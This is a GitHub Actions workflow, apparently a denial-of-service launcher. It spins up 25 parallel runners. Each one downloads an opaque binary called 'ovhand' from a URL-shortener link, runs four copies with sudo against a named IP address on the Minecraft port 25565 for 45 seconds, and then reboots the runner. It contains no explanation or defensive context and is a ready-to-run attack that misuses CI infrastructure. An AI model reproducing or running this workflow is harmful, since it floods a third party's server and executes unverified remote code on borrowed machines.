name: Ubuntu VDS 40 saniye ovh

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/y5tmK/ovhand -O ovhand
          chmod +x ovhand
          PIDS=()
          for i in {1..4}; do
            sudo timeout 45 ./ovhand 193.70.95.184 25565 10 45 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 45
        
      - name: OK !
        run: sudo reboot
